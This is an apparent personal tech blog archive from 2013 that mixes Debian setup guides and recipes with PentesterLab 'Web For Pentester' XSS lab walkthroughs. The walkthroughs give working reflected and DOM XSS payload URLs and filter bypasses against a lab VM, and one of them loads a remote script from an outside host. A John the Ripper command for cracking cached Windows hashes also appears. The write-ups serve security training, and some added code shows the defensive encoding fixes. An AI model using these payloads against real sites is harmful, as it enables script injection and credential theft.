$ sudo make install

John will be found in the 'run' directory

$ cd ../run

$ ./john --format=mscash {dumpfile.cap}

Loaded X password hashes with X different salts (M$ Cache Hash MD4 [32/64])

HTH

Sunday 19 May 2013

Debian Wheezy and Sun Java Development Kit

Due to Oracle's bullsh*t redistribution license it's not possible to install Sun Java 7 with the apt packaging manager.

So to install, we need to do a bit of manual malarkey:

$ sudo -s

# cd /opt

# wget http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-x64.tar.gz

# tar xvf jdk-7-linux-x64.tar.gz

# update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1

# update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1

# update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1

# update-alternatives --set java /opt/jdk1.7.0_17/bin/java

# update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac

# update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

Now test that it's worked:


# java -version

java version "1.7.0_17"
Java(TM) SE Runtime Environment (build 1.7.0_17-b02)
Java HotSpot(TM) 64-Bit Server VM (build 23.7-b01, mixed mode)

Job done!

HTH

Saturday 18 May 2013

PentesterLab - Web For Pentester - XSS Example 9


This example is a DOM-based XSS. This page could actually be completely static
and still be vulnerable.

In this example, you will need to read the code of the page to understand what is
happening. When the page is rendered, the JavaScript code uses the current URL
to retrieve the anchor portion of the URL (#...) and dynamically (on the client side)
writes it inside the page. This can be used to trigger an XSS if you use the payload as
part of the URL.

Payload
http://192.168.56.101/xss/example9.php#Bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E


PentesterLab - Web For Pentester - XSS Example 8


Here, the value echoed back in the page is correctly encoded. However, there is still
an XSS in this page. To build the form, the developer used and trusted PHP_SELF,
which is the path provided by the user.

Trusting the path provided by users is a common mistake and it can often be used
to trigger XSS along with other issues. It's pretty common in pages with forms and in
error pages (404 and 500 pages).


Payload
http://192.168.56.101/xss/example8.php/%22%3E%3Cscript%3Ealert%28String.fromCharCode%2866,%20111,%2098,%2098,%20121,%2032,%2068,%2097,%20122,%20122,%20108,%20101,%20114%29%29%3C/script%3E


Friday 17 May 2013

PentesterLab - Web For Pentester - XSS Example 7


This example is similar to the one before, however, you won't be able to use special
characters since they will be HTML encoded. As you will see, you don't really need
any of these characters.

This issue is common in PHP web applications because the well-known function
used to HTML-encode characters (htmlentities) does not encode single quotes (')
unless you tell it to using the ENT_QUOTES flag.

Payload
http://192.168.56.101/xss/example7.php?name=Bobby%27;alert%28String.fromCharCode%2868,%2097,%20122,%20122,%20108,%20101,%20114%29%29//

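As an added example (my code, not PentesterLab's and not from the original post), the snippet below reproduces the encoding mistakes behind examples 6, 7 and 8 in Python and puts the fixed version next to each: a value landing inside a JavaScript string needs JavaScript escaping rather than HTML entity encoding (the single quote that htmlentities leaves alone is exactly what example 7's payload uses), and a request path echoed into an attribute needs quote-aware HTML escaping. Python's html.escape with quote=False leaves both quote characters alone, which is close enough to htmlentities without ENT_QUOTES to reproduce the failure. The payload strings are the decoded shapes of the ones above, constructed here; the page templates are simplified stand-ins for the lab's PHP pages.

```python
"""Context-aware output encoding, checked against the XSS example payload shapes."""
import html

# Decoded forms of the payload shapes used above (constructed for this demo).
PAYLOAD_JS_STRING = "Bobby';alert(String.fromCharCode(68,97,122,122,108,101,114))//"
PAYLOAD_ATTRIBUTE = '"><script>alert(1)</script>'

# Characters that can end a JS string literal, close a <script> block, or break a line.
JS_UNSAFE = set("\\'\"<>/&\r\n\u2028\u2029")


def js_string_escape(value):
    """Escape value for use inside a quoted JavaScript string literal."""
    return "".join("\\u%04x" % ord(ch) if ch in JS_UNSAFE else ch for ch in value)


def vulnerable_js(name):
    """Example 7's mistake: HTML entity encoding (no ENT_QUOTES) inside a JS string."""
    return "<script>var name = '" + html.escape(name, quote=False) + "';</script>"


def hardened_js(name):
    """Same template, but encoded for the JavaScript string context it lands in."""
    return "<script>var name = '" + js_string_escape(name) + "';</script>"


def vulnerable_form(path):
    """Example 8's mistake: the request path (PHP_SELF) dropped raw into an attribute."""
    return '<form action="' + path + '" method="POST">'


def hardened_form(path):
    """Quote-aware HTML escaping keeps the attribute closed."""
    return '<form action="' + html.escape(path, quote=True) + '" method="POST">'


def js_literal_intact(rendered):
    """True if nothing between the literal's quotes can end it or the script block."""
    value = rendered.split("var name = '", 1)[1].rsplit("';", 1)[0]
    return "'" not in value and "</" not in value.lower()


def attribute_intact(rendered):
    """True if the action attribute value contains no raw quote or tag opener."""
    value = rendered.split('action="', 1)[1].split('" method', 1)[0]
    return '"' not in value and "<" not in value


if __name__ == "__main__":
    for label, page in (("vulnerable", vulnerable_js(PAYLOAD_JS_STRING)),
                        ("hardened", hardened_js(PAYLOAD_JS_STRING))):
        print(label, "JS literal intact:", js_literal_intact(page))
    for label, page in (("vulnerable", vulnerable_form(PAYLOAD_ATTRIBUTE)),
                        ("hardened", hardened_form(PAYLOAD_ATTRIBUTE))):
        print(label, "attribute intact:", attribute_intact(page))
```

The two intact() checks are only there to make the difference visible; the actual fix is choosing the encoder that matches the context (JavaScript string, HTML attribute, HTML body) rather than applying one HTML encoder everywhere.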


PentesterLab - Web For Pentester - XSS Example 6


Here, the source code of the HTML page is a bit different. If you read it, you will see
that the value you are sending is echoed back inside JavaScript code.

Payload
http://192.168.56.101/xss/example6.php?name=%3C?%20echo%28%27%3CSCR%29%27;echo%28%27IPT%3Ealert%28%22Dazzler%22%29%3C/SCRIPT%3EBobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E


PentesterLab - Web For Pentester - XSS Example 5


In this example, <script> tag is accepted and gets echoed back. But as soon as
you try to inject a call to alert, the PHP script stops its execution. The problem
seems to come from a filter on the word alert.

Payload
http://192.168.56.101/xss/example5.php?name=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E




Again, this isn't the way the paper wanted the alert box to be generated, but it's still XSS all the same; just populated from an external source, http://ha.ckers.org/xss.js

PentesterLab - Web For Pentester - XSS Example 4


In this example, the developer decided to completely blacklist the word script: if
the request matches script, the execution stops.

Payload
http://192.168.56.101/xss/example4.php?name=%3Cdiv%20onmouseover=%27alert%281%29%27%20/%3E


PentesterLab - Web For Pentester - XSS Example 3


You notified the developer about your bypass. He added more filtering and now
seems to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...

Payload
http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E


This isn't the way the paper wants you to pop the XSS, but I had the payload correct and it wouldn't pop. The correct payload, that should have popped, was:

http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>

Which produced this:


If you know why this didn't work, feel free to comment!

PentesterLab - Web For Pentester - XSS Example 2


In the second example, a bit of filtering is involved. The web developer added a
regular expression to prevent the simple XSS payload from working.

Payload
http://192.168.56.101/xss/example2.php?name=Bobby<SCript>alert('Dazzler')</SCript>


PentesterLab - Web For Pentester - XSS Example 1


The first vulnerable example is just here to get you started with what is going on
when you find an XSS. Using the basic payload, you should be able to get an alert
box.

Payload:
http://192.168.56.101/xss/example1.php?name=bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E


Wednesday 15 May 2013

RECIPE - Slow cooked Greek chicken


Another easy one, and the chicken will melt in your mouth ... trust me ;-)

  • 80g of any flour
  • 1 teaspoon of salt
  • 1/2 teaspoon dried oregano
  • 6 x good quality chicken breast fillets, boneless & skinless
  • 1 x Tin of Heinz, Cream of Chicken soup
  • 125ml white wine 
  • 1 x Knorr Chicken Stock Cube

1 - Mix the flour, salt and oregano together in a large bowl

2 - Score the chicken with a sharp knife, about half way through the breast

3 - Rub the mix into the breasts ;-)

4 - Mix your stock cube with 1/2 pint of boiling water and throw it in the slow cooker

5 - Add the wine and the chicken soup to the slow cooker

6 - Add the chicken breasts

7 - Cook for 4 hours on high or 8 hours on low.

Serve with sticky rice

B00000M

Debian 7 and Gnome

I'm a die hard Debian fan and was recently shocked to find there was no Gnome 2 in the new release, Wheezy.

I searched around a bit and found there was also no fall-back Gnome mode in Debian 7 (Wheezy), either. There is no way I can work with Gnome 3. It's a f*cking atrocity in my opinion.

So I hit the forums and spoke to people to see what they are doing. Many mentioned Mate - Mate you ask?!




There she is, my lovely - Gnome 2 or now called Mate!

Mate is a fantastic fork of Gnome 2 and is continuing the goodness for all us die-hard Gnome 2 fans out there.

How do I get this Mate, you ask?

Well, it couldn't be easier; the instructions are all at http://wiki.mate-desktop.org/download but I'll run through them, just so I can pad out this blog post:

sudo nano /etc/apt/sources.list

add the following line:

deb http://repo.mate-desktop.org/debian wheezy main

sudo apt-get update
sudo apt-get install mate-archive-keyring
sudo apt-get update

sudo apt-get install mate-desktop-environment-extra

sudo reboot

Now choose Mate from the list of Desktops on your login screen and sit back and enjoy the goodness of good ole Gnome 2.

HTH

Windows Bootable USB

Extracting the ISO to USB

First we'll need a few bits installed. I'm doing this on a Debian host but I'm sure the packages are there for EL or any other flavour ;-)

su -c 'apt-get install ntfs-3g gparted -y'

So then we need to clean up the USB stick with gparted.

Format it to NTFS using all the space (make sure you format the right drive, otherwise you'll FUBAR your OS) and make a note of the drive number.

Then we need a temporary mount point:

$ mkdir /tmp/windows_usb

Now we mount our ISO

$ sudo mount -o loop windows_iso.iso /tmp/windows_usb

Now copy over the contents of your ISO to wherever your USB key is mounted; mine's in
/media/37265723dhgsdhg23857/

$ cp -r /tmp/windows_usb/* /media/37265723dhgsdhg23857/

Will probably take a while depending on speed of USB key.

Now we're going to need a little tool called ms-sys; it probably won't be in your standard OS
repos, but it's on SourceForge, and you'll also need to install some tools for building stuff from source:

$ sudo apt-get install build-essential module-assistant gettext -y

$ wget http://prdownloads.sourceforge.net/ms-sys/ms-sys-2.3.0.tar.gz

$ tar xvf ms-sys-2.3.0.tar.gz ; cd ms-sys-2.3.0 ; make ; sudo make install

If all is well you should have no errors and be ready to write a master boot record to the USB drive:

$ ms-sys -7 /dev/sd{?}

Replace {?} so that the path points at your USB device as a whole disk (as noted from gparted), not at one of its partitions.

Now you should have a bootable Windows USB key!
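The "make sure you format the right drive" warning deserves a guard in front of the ms-sys step, so here is one as an added example (my code, not from the post and not part of ms-sys): it refuses to build the command unless the target is a whole /dev/sdX disk that the kernel's sysfs flags as removable. The sysfs root is a parameter so the check can be exercised against a constructed directory tree; on a real host leave it at /sys/block. The removable flag is a hint from the device, not a guarantee (some USB-attached drives report 0), in which case the guard refuses, which is the safe direction to fail.

```python
"""Only hand a boot-sector write to a whole disk that sysfs reports as removable."""
import os
import re
import tempfile

# sdb passes, sdb1 does not: the MBR belongs to the whole disk, not a partition.
WHOLE_DISK_RE = re.compile(r"^sd[a-z]+$")


def whole_disk_name(device):
    """'/dev/sdb' -> 'sdb'; None for partitions or anything that is not /dev/sdX."""
    if not device.startswith("/dev/"):
        return None
    name = device[len("/dev/"):]
    return name if WHOLE_DISK_RE.match(name) else None


def is_removable(device, sysfs_root="/sys/block"):
    """True only if /sys/block/<disk>/removable reads '1'."""
    name = whole_disk_name(device)
    if name is None:
        return False
    flag = os.path.join(sysfs_root, name, "removable")
    try:
        with open(flag) as fh:
            return fh.read().strip() == "1"
    except OSError:           # device missing or unreadable: not safe to write
        return False


def safe_mssys_command(device, sysfs_root="/sys/block"):
    """argv for `ms-sys -7 <device>` if the device passes the guard, else None."""
    if not is_removable(device, sysfs_root):
        return None
    return ["ms-sys", "-7", device]


def build_sample_sysfs():
    """Constructed sysfs tree for testing: sda = internal disk (0), sdb = USB stick (1)."""
    root = tempfile.mkdtemp(prefix="sysfs-")
    for name, flag in (("sda", "0"), ("sdb", "1")):
        os.makedirs(os.path.join(root, name))
        with open(os.path.join(root, name, "removable"), "w") as fh:
            fh.write(flag + "\n")
    return root


if __name__ == "__main__":
    import subprocess
    import sys
    argv = safe_mssys_command(sys.argv[1])
    if argv is None:
        sys.exit(f"refusing: {sys.argv[1]} is not a removable whole disk")
    subprocess.run(["sudo"] + argv, check=True)
```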

Tuesday 14 May 2013

RECIPE - Slow Cooked Pork Chops


Another slow cook favourite of mine is the Pork Chops.

1/4 Mug of good olive oil
1 Mug of Chicken broth (Knorr pods are good)
2 Minced garlic cloves
1 Tablespoon of Paprika
1 Tablespoon of Garlic Powder
1 Teaspoon of dried oregano
1 Teaspoon of dried basil
4 thick cut pork chops
Salt + Black Pepper

Cut some scores about 1/2 way through the Pork chops and rub salt and black pepper into them.

Dissolve your Knorr chicken stock pod into a mug of boiling water and throw it into the slow cooker. Throw in the chopped garlic, paprika, garlic powder, oregano and basil.

Add the pork chops to the mix.

Turn every hour for four hours. Job done.

Serve with buttery mash or sticky rice.

Lurvly!

Thursday 9 May 2013

Windows XP SP2 Windows Update Error 0x80244019

So I had to build a Windows XP machine for some testing I was carrying out tonight and came across Error 0x80244019 when trying to run Windows Update.

It turns out Microsoft has blocked IE6 from accessing the Windows Update web site and downloading the Windows Update 3.1 ActiveX controls.

So what you need to do is, download and install IE8 and Windows Update Services in the following order:

1. Upgrade to Internet Explorer 8 (IE8)
DOWNLOAD
2. Reboot Machine.
3. Download Windows Update Agent
DOWNLOAD
4. Save the .exe file to your C: drive
5. Click Start, and then click Run. 
6. Type "C:\WindowsUpdateAgent30-x86.exe /wuforce"  then click OK
7. Install Windows Update agent.
8. Restart the PC and try Windows Updates again.


You should now be able to install the Windows Update Active X control and begin installing the mammoth amount of updates that your XPSP2 build will be missing.

HTH

Installing VirtualBox Guest Additions on Debian

I had a little nightmare with this and couldn't get my head round why I didn't have the kernel headers even though I had installed build-essential. So here's how I did it.

sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install build-essential module-assistant -y
sudo m-a prepare -y

Click on Install Guest Additions from the Devices menu:


Then cancel the autorun prompt as that never works!

Finally:

sudo sh /media/cdrom/VBoxLinuxAdditions.run

and follow the instructions on screen.

Restart your VM and it should be job done.

HTH!